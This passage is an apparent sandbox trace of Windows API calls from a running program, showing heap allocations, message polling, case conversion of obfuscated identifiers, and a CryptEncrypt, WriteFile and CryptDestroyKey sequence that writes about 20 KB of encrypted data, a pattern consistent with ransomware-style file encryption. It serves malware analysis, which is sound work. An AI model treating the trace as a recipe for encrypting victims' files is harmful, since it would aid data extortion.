lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0211.922] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0211.922] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x37f3348 [0211.922] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.922] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.923] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.924] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0211.924] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.924] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0211.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.925] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.925] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.925] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.926] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x51aa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x51b0) returned 1 [0211.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.926] CharLowerBuffW (in: lpsz="byte[20912]", cchLength=0xb | out: lpsz="byte[20912]") returned 0xb [0211.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.927] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.927] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.927] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a84ca0*, pdwDataLen=0x8cef60*=0x51aa, dwBufLen=0x51b0 | out: pbData=0x2a84ca0*, pdwDataLen=0x8cef60*=0x51b0) returned 1 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.928] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.928] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.928] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.928] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.928] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.928] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.928] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.929] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.929] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.929] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.929] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.929] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.930] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.930] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.930] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.930] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a7a930*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesWritten=0x8cf5e4*=0x51b0, lpOverlapped=0x0) returned 1 [0211.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.932] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.932] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.932] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.932] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.932] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.932] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.932] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab0e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.932] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0211.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.932] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.932] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.932] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.933] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.933] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.933] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.933] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.933] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.933] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.934] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.934] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.934] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.934] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.934] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] CharUpperBuffW (in: 